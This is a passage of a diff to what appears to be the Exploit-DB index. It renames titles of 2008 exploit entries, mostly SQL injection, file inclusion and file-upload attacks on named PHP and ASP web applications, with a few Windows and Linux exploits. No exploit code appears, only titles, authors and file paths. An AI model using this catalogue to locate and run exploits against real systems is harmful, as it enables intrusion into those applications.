Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 -5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) Remote SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion Vulnerabilities",2008-06-20,cyberlog,php,webapps,0 -5877,platforms/php/webapps/5877.txt,"jaxultrabb <= 2.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 -5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - (cat_id) Remote SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 -5879,platforms/php/webapps/5879.txt,"PHPAuction (profile.php user_id) Remote SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 +5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - (cat_id) SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 +5879,platforms/php/webapps/5879.txt,"PHPAuction (profile.php user_id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5880,platforms/php/webapps/5880.txt,"sitexs CMS 0.1.1 - (upload/XSS) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - (cat_id) SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 -5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase <= 0.41 - Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 -5886,platforms/php/webapps/5886.pl,"LaserNet CMS <= 1.5 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 -5887,platforms/php/webapps/5887.pl,"LE.CMS <= 1.4 - Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 -5888,platforms/php/webapps/5888.txt,"CCLeague Pro <= 1.2 Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 -5889,platforms/php/webapps/5889.txt,"OFFL <= 0.2.6 - (teams.php fflteam) Remote SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 -5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME (news.php id) Remote SQL Injection",2008-06-21,"Hussin X",php,webapps,0 -5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) Remote SQL Injection",2008-06-21,"Hussin X",php,webapps,0 +5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection Exploit",2008-06-21,t0pP8uZz,php,webapps,0 +5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 +5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Remote Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 +5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 +5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 +5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME (news.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 +5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 5893,platforms/php/webapps/5893.txt,"Joomla Component EXP Shop (catid) SQL Injection",2008-06-22,His0k4,php,webapps,0 -5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) Remote SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 -5895,platforms/php/webapps/5895.txt,"shibby shop <= 2.2 - (SQL/update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 +5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 +5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - (SQL/update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection Exploit",2008-06-22,"Guido Landi",php,webapps,0 -5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) 0.3 Beta - Remote SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 +5899,platforms/php/webapps/5899.txt,"PageSquid CMS (index.php page) 0.3 Beta - SQL Injection",2008-06-22,"CWH Underground",php,webapps,0 5900,platforms/php/webapps/5900.txt,"RSS-Aggregator (display.php path) Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 @@ -5528,14 +5528,14 @@ id,file,description,date,author,platform,type,port 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) Remote SQL Injection",2008-06-23,SxCx,php,webapps,0 +5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) SQL Injection",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0 -5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 +5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - (guide.php id) SQL Injection",2008-06-23,dun,php,webapps,0 5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0 5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Vulnerabilities",2008-06-23,"CWH Underground",php,webapps,0 -5914,platforms/php/webapps/5914.txt,"Demo4 CMS (index.php id) Remote SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 -5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 - RFI",2008-06-23,Kacak,php,webapps,0 +5914,platforms/php/webapps/5914.txt,"Demo4 CMS (index.php id) SQL Injection",2008-06-23,"CWH Underground",php,webapps,0 +5915,platforms/php/webapps/5915.txt,"Joomla Component com_facileforms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0 5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5917,platforms/php/webapps/5917.txt,"tinx CMS 1.1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5918,platforms/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit",2008-06-23,Exodus,windows,dos,0 @@ -5544,27 +5544,27 @@ id,file,description,date,author,platform,type,port 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 - (listing_id) SQL Injection",2008-06-24,K-159,php,webapps,0 -5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0 +5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - (listing_id) SQL Injection",2008-06-24,K-159,php,webapps,0 +5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 -5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) Remote SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 +5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0 5928,platforms/php/webapps/5928.txt,"HiveMaker Directory (index.php cid) SQL Injection",2008-06-24,"security fears team",php,webapps,0 5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0 -5930,platforms/php/webapps/5930.txt,"Link ADS 1 - (out.php linkid) Remote SQL Injection",2008-06-24,"Hussin X",php,webapps,0 -5931,platforms/php/webapps/5931.pl,"TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit",2008-06-24,k1tk4t,php,webapps,0 -5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5930,platforms/php/webapps/5930.txt,"Link ADS 1 - (out.php linkid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0 +5931,platforms/php/webapps/5931.pl,"TOKOKITA (barang.php produk_id) SQL Injection Exploit",2008-06-24,k1tk4t,php,webapps,0 +5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 5935,platforms/php/webapps/5935.pl,"Mambo Component Articles (artid) Blind SQL Injection Exploit",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Remote Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 -5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 -5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 +5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 +5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0 5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 -5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 -5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 +5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 +5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 -5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 +5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 - (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0 @@ -5578,88 +5578,88 @@ id,file,description,date,author,platform,type,port 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 -5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) Remote SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 -5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds (lid) Remote SQL Injection",2008-06-27,boom3rang,php,webapps,0 +5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0 +5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod classifieds (lid) SQL Injection",2008-06-27,boom3rang,php,webapps,0 5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (LFI/XSS) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0 -5963,platforms/php/webapps/5963.txt,"Joomla Component jabode (id) Remote SQL Injection",2008-06-28,His0k4,php,webapps,0 +5963,platforms/php/webapps/5963.txt,"Joomla Component jabode (id) SQL Injection",2008-06-28,His0k4,php,webapps,0 5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - (id) SQL Injection",2008-06-28,"Hussin X",php,webapps,0 -5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition Remote SQL Injection",2008-06-28,His0k4,php,webapps,0 +5965,platforms/php/webapps/5965.txt,"Joomla Component beamospetition SQL Injection",2008-06-28,His0k4,php,webapps,0 5966,platforms/php/webapps/5966.pl,"Joomla Component Xe webtv (id) Blind SQL Injection Exploit",2008-06-28,His0k4,php,webapps,0 -5967,platforms/php/webapps/5967.txt,"SebracCMS <= 0.4 - Multiple SQL Injection Vulnerabilities",2008-06-28,shinmai,php,webapps,0 +5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injection Vulnerabilities",2008-06-28,shinmai,php,webapps,0 5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS",2008-06-30,"Travis Warren",windows,dos,0 -5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) Remote SQL Injection",2008-06-30,anonymous,php,webapps,0 -5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) Remote SQL Injection",2008-06-30,JuDge,php,webapps,0 +5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 +5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development (products.php) SQL Injection",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 -5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,anonymous,php,webapps,0 -5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 -5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) Remote SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 -5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) Remote SQL Injection",2008-06-30,DNX,php,webapps,0 +5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injection Vulnerabilities",2008-06-30,anonymous,php,webapps,0 +5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 - Multiple SQL Injection Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 +5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery Multiple SQL Injection Vulnerabilities",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 - (index.php page) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 -5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) 2008-01-24 - Remote SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) Remote SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 -5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium <= 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 -5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - (cat_id) Remote SQL Injection",2008-07-01,Kacak,php,webapps,0 -5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) Remote SQL Injection",2008-07-01,"Hussin X",php,webapps,0 +5984,platforms/php/webapps/5984.txt,"Sisplet CMS (index.php id) 2008-01-24 - SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0 +5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution Exploit",2008-07-01,"Charles Fol",php,webapps,0 +5987,platforms/php/webapps/5987.txt,"Efestech Shop 2.0 - (cat_id) SQL Injection",2008-07-01,Kacak,php,webapps,0 +5988,platforms/php/webapps/5988.txt,"plx Ad Trader 3.2 - (adid) SQL Injection",2008-07-01,"Hussin X",php,webapps,0 5989,platforms/php/webapps/5989.txt,"Joomla Component versioning 1.0.2 - (id) SQL Injection",2008-07-01,"DarkMatter Crew",php,webapps,0 -5990,platforms/php/webapps/5990.txt,"Joomla Component mygallery (cid) Remote SQL Injection",2008-07-01,Houssamix,php,webapps,0 -5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) Remote SQL Injection",2008-07-02,haZl0oh,php,webapps,0 +5990,platforms/php/webapps/5990.txt,"Joomla Component mygallery (cid) SQL Injection",2008-07-01,Houssamix,php,webapps,0 +5991,platforms/php/webapps/5991.txt,"XchangeBoard 1.70 - (boardID) SQL Injection",2008-07-02,haZl0oh,php,webapps,0 5992,platforms/php/webapps/5992.txt,"CMS little (index.php template) 0.0.1 - Local File Inclusion",2008-07-02,"CWH Underground",php,webapps,0 5993,platforms/php/webapps/5993.txt,"Joomla Component com_brightweblinks (catid) SQL Injection",2008-07-02,His0k4,php,webapps,0 -5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 -5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 - Multiple Remote SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 +5994,platforms/php/webapps/5994.pl,"Joomla Component QuickTime VR 0.1 - SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 +5995,platforms/php/webapps/5995.pl,"Joomla Component is 1.0.1 - Multiple SQL Injection Exploit",2008-07-02,Houssamix,php,webapps,0 5996,platforms/php/webapps/5996.txt,"phPortal 1.2 - Multiple Remote File Inclusions Exploit",2008-07-02,Ciph3r,php,webapps,0 5997,platforms/php/webapps/5997.pl,"CMS WebBlizzard (index.php page) Blind SQL Injection Exploit",2008-07-03,Bl@ckbe@rD,php,webapps,0 5998,platforms/php/webapps/5998.txt,"phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection",2008-07-03,storm,php,webapps,0 5999,platforms/php/webapps/5999.txt,"phpWebNews 0.2 MySQL Edition (det) SQL Injection",2008-07-03,"Virangar Security",php,webapps,0 6000,platforms/php/webapps/6000.txt,"pHNews CMS - Multiple Local File Inclusion Vulnerabilities",2008-07-03,CraCkEr,php,webapps,0 -6001,platforms/php/webapps/6001.txt,"1024 CMS <= 1.4.4 - Multiple Remote/Local File Inclusion Vulnerabilities",2008-07-04,DSecRG,php,webapps,0 -6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0 -6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 - RFI",2008-07-04,SsEs,php,webapps,0 +6001,platforms/php/webapps/6001.txt,"1024 CMS 1.4.4 - Multiple Remote/Local File Inclusion Vulnerabilities",2008-07-04,DSecRG,php,webapps,0 +6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0 +6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery 1.4.1.1 - Remote File Inclusion",2008-07-04,SsEs,php,webapps,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0 -6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 +6005,platforms/php/webapps/6005.php,"Site@School 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities",2008-07-05,BlackH,php,webapps,0 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 -6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 +6008,platforms/php/webapps/6008.php,"ImperialBB 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 6009,platforms/php/webapps/6009.pl,"fuzzylime CMS 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 -6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - (uid) Remote SQL Injection",2008-07-06,"HIva Team",php,webapps,0 +6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - (uid) SQL Injection",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 - (upload/XSS) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,platforms/osx/remote/6013.pl,"Safari + Quicktime <= 7.3 RTSP Content-Type Remote BoF Exploit",2008-07-06,krafty,osx,remote,0 +6013,platforms/osx/remote/6013.pl,"Safari + Quicktime 7.3 RTSP Content-Type Remote BoF Exploit",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - (idDirectory) Blind SQL Injection",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 6016,platforms/php/webapps/6016.pl,"fuzzylime CMS 3.01a (file) Local File Inclusion Exploit",2008-07-07,Cod3rZ,php,webapps,0 6017,platforms/php/webapps/6017.pl,"Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit",2008-07-07,girex,php,webapps,0 6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition Remote Code Execution Exploit",2008-07-07,Ams,php,webapps,0 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Exploit",2008-07-07,ka0x,php,webapps,0 -6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - Remote SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 -6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script <= 1.1 - Remote SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 +6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 +6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion Vulnerabilities",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 - (ItemID) SQL Injection",2008-07-08,unknown_styler,php,webapps,0 6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 -6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script <= 4.0 - Remote SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 +6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - (m3u) Local BoF Exploit (0Day)",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) BoF PoC",2008-07-08,Defsanguje,windows,local,0 -6032,platforms/linux/local/6032.py,"Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres 